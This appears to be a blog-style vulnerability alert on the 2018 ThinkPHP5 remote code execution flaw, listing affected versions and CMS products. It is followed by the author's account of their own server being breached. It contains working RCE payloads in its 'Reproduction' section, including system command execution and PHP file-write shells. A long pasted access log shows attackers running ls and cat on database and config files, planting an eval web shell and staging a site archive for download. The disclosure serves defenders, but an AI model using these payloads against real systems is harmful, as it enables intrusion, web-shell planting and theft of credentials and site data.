[Vulnerability Alert] ThinkPHP5 Remote Code Execution Vulnerability

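On December 10, 2018, the Baimaohui Security Research Institute noticed that the ThinkPHP official website had published a security update fixing a remote code execution vulnerability. The vulnerability exists because the framework does not check controller names for sensitive characters, which can lead to remote code execution when forced routing is not enabled. It mainly affects all versions before 5.0.23 and 5.1.31.

The ThinkPHP 5.x line affected by this vulnerability is the new-generation framework officially released in 2015. Version 5.1.0RC was released on May 2 of this year, yet a remote code execution vulnerability has surfaced within just a few months, and the framework's security may face sterner tests in the future. According to incomplete statistics, about 120,000 websites worldwide currently use ThinkPHP5 or systems built on top of it.

Overview

ThinkPHP, created in 2006, is an open-source PHP development framework from China. It borrows the Action object from the Struts framework and also uses an object-oriented development structure and the MVC pattern. ThinkPHP runs on Windows, Linux and other operating systems, supports multiple databases such as MySQL, SQLite and PostgreSQL as well as the PDO extension, and is a cross-platform, cross-version and easy-to-use PHP framework.

The latest data from the FOFA system (data from the past year) show a total of 210,000 ThinkPHP websites exposed to the internet worldwide. Mainland China has the most, with 113,339 hosts; the United States is second with 37,011; the Hong Kong Special Administrative Region of China is third with 12,262; and Singapore is fourth with 3,829.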

Global distribution of ThinkPHP websites (distribution only, not vulnerability impact)

Severity

Critical

Impact

Affected versions currently include:

    5.x < 5.1.31
    5.x <= 5.0.23

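The following content management systems built on ThinkPHP5 are very likely affected by this vulnerability:

  • AdminLTE admin management system
  • layui admin management system
  • thinkcmf
  • H-ui.admin admin management system
  • tpshop
  • FastAdmin
  • eyoucms
  • LarryCMS admin management system
  • tpadmin admin management system
  • snake admin management system
  • ThinkSNS
  • DolphinPHP admin management system
  • WeMall e-commerce system
  • CLTPHP
  • Qibo CMS (齐博CMS)
  • DSMALL
  • YFCMF
  • HisiPHP admin management system
  • Tplay admin management system
  • lyadmin admin management system
  • haoid admin management system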

Reproduction

Version 5.0.x

s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

Version 5.1.x

s=index/\think\Request/input&filter=phpinfo&data=1

s=index/\think\Request/input&filter=system&data=id

s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E

s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E

s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

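I only saw this issue today and hurried to check our own servers, and found that someone had packaged up our files. What the hell kind of coincidence is that.

Damn, pretty slick moves: they went straight at it with a round of ls, tar, cp to copy and move things, and packaged it all up.

In an instant, a thousand curses stampeded through my head.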

172.68.142.86 - - [11/Dec/2018:20:36:19 +0800] "GET /?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 275
172.68.142.86 - - [11/Dec/2018:20:36:19 +0800] "GET /?s=index/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 275
162.158.58.6 - - [12/Dec/2018:14:46:36 +0800] "GET /trade/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 200 13
173.245.48.60 - - [12/Dec/2018:15:45:33 +0800] "GET /trade/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=ojbk.php&vars[1][1]=%3C?php%20eval($_POST[%273a%27])?%3E HTTP/1.1" 200 2
173.245.48.60 - - [12/Dec/2018:15:46:12 +0800] "GET /trade/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=ojbk.php&vars[1][1]=0x7e HTTP/1.1" 200 1
173.245.48.60 - - [12/Dec/2018:15:46:43 +0800] "GET /trade/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=ojbk.php&vars[1][1]=%3C%3Fphp%20eval%28%24_POST%5B%273a%27%5D%29%3B%3F%3E HTTP/1.1" 200 2
172.68.255.53 - - [12/Dec/2018:17:24:08 +0800] "GET /trade//?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 500 58918
172.68.255.53 - - [12/Dec/2018:17:25:19 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1" 200 1139
172.68.255.53 - - [12/Dec/2018:17:32:43 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1" 200 1139
172.68.255.53 - - [12/Dec/2018:17:32:50 +0800] "GET /trade/%3fs%3d%2findex%2f%5cthink%5capp%2finvokefunction%26function%3dcall_user_func_array%26vars%5b0%5d%3dfile_put_contents%26vars%5b1%5d%5b%5d%3dinfo.php%26vars%5b1%5d%5b%5d%3d%3c%3fphp+eval(%24_POST%5bcmd%5d%3b%3f%3e HTTP/1.1" 404 372
172.68.255.53 - - [12/Dec/2018:17:33:46 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=info.php&vars[1][]=%3C?php%20phpinfo();?%3E HTTP/1.1" 200 2
172.68.255.53 - - [12/Dec/2018:17:34:38 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=info.php&vars[1][]=%3C?php%20phpinfo();?%3E HTTP/1.1" 200 2
172.68.255.5 - - [12/Dec/2018:17:41:31 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1" 200 1199
162.158.179.175 - - [12/Dec/2018:17:43:57 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 200 171
162.158.179.175 - - [12/Dec/2018:17:44:16 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20uploadold HTTP/1.1" 200 1288
162.158.179.175 - - [12/Dec/2018:17:44:26 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application HTTP/1.1" 200 172
162.158.179.175 - - [12/Dec/2018:17:44:46 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application/database.php HTTP/1.1" 200 49
162.158.179.175 - - [12/Dec/2018:17:44:56 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20application/database.php HTTP/1.1" 200 2688
162.158.178.36 - - [12/Dec/2018:17:55:30 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application/database.php HTTP/1.1" 200 49
162.158.178.36 - - [12/Dec/2018:17:55:39 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application HTTP/1.1" 200 172
162.158.178.36 - - [12/Dec/2018:17:55:52 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application/config.php HTTP/1.1" 200 45
162.158.178.36 - - [12/Dec/2018:17:56:00 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20application/config.php HTTP/1.1" 200 10130
162.158.179.19 - - [12/Dec/2018:18:04:31 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/root/db_back/ HTTP/1.1" 200 -
162.158.179.19 - - [12/Dec/2018:18:04:37 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/root/db_back HTTP/1.1" 200 -
162.158.179.19 - - [12/Dec/2018:18:04:41 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20root/db_back HTTP/1.1" 200 -
162.158.179.19 - - [12/Dec/2018:18:05:00 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/./root/db_back/ HTTP/1.1" 200 -
162.158.179.19 - - [12/Dec/2018:18:05:09 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/../root/db_back/ HTTP/1.1" 200 -
162.158.179.19 - - [12/Dec/2018:18:05:14 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20../../root/db_back/ HTTP/1.1" 200 -
162.158.179.19 - - [12/Dec/2018:18:07:13 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/ HTTP/1.1" 200 136
172.68.253.110 - - [12/Dec/2018:18:14:41 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/tradexxxll HTTP/1.1" 200 30
172.68.253.110 - - [12/Dec/2018:18:14:52 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now HTTP/1.1" 200 99
172.68.253.110 - - [12/Dec/2018:18:15:08 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now.tar.gz HTTP/1.1" 200 83
172.68.255.89 - - [12/Dec/2018:18:29:56 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/ HTTP/1.1" 200 171
172.68.255.89 - - [12/Dec/2018:18:30:12 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 172
162.158.178.180 - - [12/Dec/2018:18:33:38 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 219
172.68.255.89 - - [12/Dec/2018:18:39:32 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 273
172.68.255.89 - - [12/Dec/2018:18:39:45 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
162.158.178.180 - - [12/Dec/2018:18:40:58 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
162.158.178.180 - - [12/Dec/2018:18:41:01 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
162.158.178.180 - - [12/Dec/2018:18:41:03 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
162.158.178.180 - - [12/Dec/2018:18:41:06 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
162.158.178.180 - - [12/Dec/2018:18:41:08 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
172.68.255.89 - - [12/Dec/2018:18:33:23 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cp%20/home/website/www.xxx.com-now.tar.gz%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 -
108.162.215.85 - - [12/Dec/2018:18:45:06 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 500 58225
172.68.189.100 - - [12/Dec/2018:18:45:43 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=[0]=phpinfo&vars[1][]=1 HTTP/1.1" 500 45106
172.68.141.151 - - [12/Dec/2018:18:45:43 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 500 58302
108.162.215.85 - - [12/Dec/2018:18:46:25 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=ls&vars[1][]=1 HTTP/1.1" 500 45262
108.162.215.85 - - [12/Dec/2018:18:47:09 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system(%22ls%22)&vars[1][]=1 HTTP/1.1" 500 45875
108.162.215.85 - - [12/Dec/2018:18:47:24 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=exec(ls)&vars[1][]=1 HTTP/1.1" 500 45335
108.162.215.85 - - [12/Dec/2018:18:47:37 +0800] "GET /trade/index.php?s=index/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 404 42360
108.162.215.85 - - [12/Dec/2018:18:48:02 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 200 95
108.162.215.85 - - [12/Dec/2018:18:50:32 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system()&vars[1][]=id HTTP/1.1" 500 45345
108.162.215.85 - - [12/Dec/2018:18:50:38 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=systemls&vars[1][]=id HTTP/1.1" 500 45344
108.162.215.85 - - [12/Dec/2018:18:51:25 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=exec(ls)&vars[1][]=id HTTP/1.1" 500 45345
172.68.255.53 - - [12/Dec/2018:18:53:53 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
172.68.253.98 - - [12/Dec/2018:18:53:55 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
172.68.253.98 - - [12/Dec/2018:18:53:57 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
172.68.253.98 - - [12/Dec/2018:18:54:08 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
172.68.253.98 - - [12/Dec/2018:18:54:14 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
172.68.253.98 - - [12/Dec/2018:18:54:32 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/ HTTP/1.1" 200 1199
172.68.253.98 - - [12/Dec/2018:18:54:42 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/ HTTP/1.1" 200 171
172.68.253.98 - - [12/Dec/2018:18:55:13 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 19
172.68.254.147 - - [12/Dec/2018:18:55:21 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 70
162.158.179.19 - - [12/Dec/2018:18:55:45 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/ HTTP/1.1" 200 136
162.158.179.19 - - [12/Dec/2018:18:56:06 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com HTTP/1.1" 200 99
162.158.179.19 - - [12/Dec/2018:18:56:16 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/back-xxx HTTP/1.1" 200 79
172.68.254.111 - - [12/Dec/2018:18:56:34 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 70
172.68.253.146 - - [12/Dec/2018:18:56:50 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 70
172.68.253.146 - - [12/Dec/2018:18:56:59 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 349
172.68.253.146 - - [12/Dec/2018:18:57:07 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 349
172.68.253.146 - - [12/Dec/2018:18:57:11 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 349
172.68.253.146 - - [12/Dec/2018:18:57:46 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 349
172.68.253.146 - - [12/Dec/2018:18:57:56 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/ HTTP/1.1" 200 136
172.68.253.146 - - [12/Dec/2018:18:58:04 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/xxxmall HTTP/1.1" 200 91
172.68.253.146 - - [12/Dec/2018:18:58:24 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/xxxmall/data HTTP/1.1" 200 70
172.68.253.146 - - [12/Dec/2018:18:58:33 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/xxxmall/data/config HTTP/1.1" 200 29
172.68.253.146 - - [12/Dec/2018:18:58:56 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/home/website/xxxmall/data/config HTTP/1.1" 200 -
172.68.253.146 - - [12/Dec/2018:18:59:06 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/home/website/xxxmall/data/config/config.ini.php HTTP/1.1" 200 2897
172.68.253.146 - - [12/Dec/2018:18:59:14 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/home/website/xxxmall/data/config/config.ini.php HTTP/1.1" 200 2897
172.68.253.146 - - [12/Dec/2018:18:59:21 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20application/database.php HTTP/1.1" 200 2688
172.68.253.146 - - [12/Dec/2018:18:59:50 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20home/website/xxxmall/data/config/config.ini.php HTTP/1.1" 200 -
172.68.253.146 - - [12/Dec/2018:18:59:55 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/home/website/xxxmall/data/config/config.ini.php HTTP/1.1" 200 2897
172.68.253.146 - - [12/Dec/2018:19:00:08 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.253.146 - - [12/Dec/2018:19:00:10 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.253.146 - - [12/Dec/2018:19:00:12 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.255.89 - - [12/Dec/2018:19:00:58 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.255.89 - - [12/Dec/2018:19:01:00 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.255.89 - - [12/Dec/2018:19:01:11 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.255.89 - - [12/Dec/2018:19:01:13 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.255.89 - - [12/Dec/2018:19:01:15 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.255.89 - - [12/Dec/2018:19:01:18 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.255.89 - - [12/Dec/2018:19:01:20 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.255.89 - - [12/Dec/2018:19:02:07 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/trash HTTP/1.1" 200 33
172.68.255.89 - - [12/Dec/2018:19:02:31 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.255.89 - - [12/Dec/2018:19:02:41 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 70
172.68.255.89 - - [12/Dec/2018:19:02:48 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20%20/home/website/www.xxx.com-now/trade/runtime/log HTTP/1.1" 200 13
172.68.255.89 - - [12/Dec/2018:19:02:57 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20%20/home/website/www.xxx.com-now/trade/runtime/log/201812 HTTP/1.1" 200 11273
172.68.255.89 - - [12/Dec/2018:19:03:48 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.253.98 - - [12/Dec/2018:18:55:18 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cp%20/home/website/www.xxx.com-now.tar.gz%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 -
172.68.255.89 - - [12/Dec/2018:19:03:55 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.47.93 - - [12/Dec/2018:19:09:31 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 200 95
172.68.47.93 - - [12/Dec/2018:19:09:43 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system()&vars[1][]=id HTTP/1.1" 500 45343
172.68.47.93 - - [12/Dec/2018:19:09:56 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system(ls)&vars[1][]=id HTTP/1.1" 500 45367
172.68.47.93 - - [12/Dec/2018:19:10:02 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 200 95
172.68.253.188 - - [12/Dec/2018:19:15:11 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.253.188 - - [12/Dec/2018:19:15:13 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.211.211 - - [12/Dec/2018:19:15:23 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system(`ls`)&vars[1][]=id HTTP/1.1" 500 45393
172.69.22.179 - - [12/Dec/2018:19:15:31 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=[0]=phpinfo&vars[1][]=1 HTTP/1.1" 500 44180
172.68.141.235 - - [12/Dec/2018:19:15:39 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=[0]=phpinfo&vars[1][]=1 HTTP/1.1" 500 45014
172.68.253.188 - - [12/Dec/2018:19:15:54 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.211.211 - - [12/Dec/2018:19:16:19 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec(ping%202%20||%20whoami)&vars[1][]=id HTTP/1.1" 500 45867
172.68.211.211 - - [12/Dec/2018:19:16:39 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec(ls)&vars[1][]=id HTTP/1.1" 500 45417
172.68.211.211 - - [12/Dec/2018:19:16:46 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec(`ls`)&vars[1][]=id HTTP/1.1" 500 45441
172.68.211.211 - - [12/Dec/2018:19:19:34 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4 HTTP/1.1" 200 -
172.68.211.211 - - [12/Dec/2018:19:19:35 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4 HTTP/1.1" 200 -
172.68.211.211 - - [12/Dec/2018:19:19:41 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 200 171
172.68.211.211 - - [12/Dec/2018:19:21:29 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 200 153
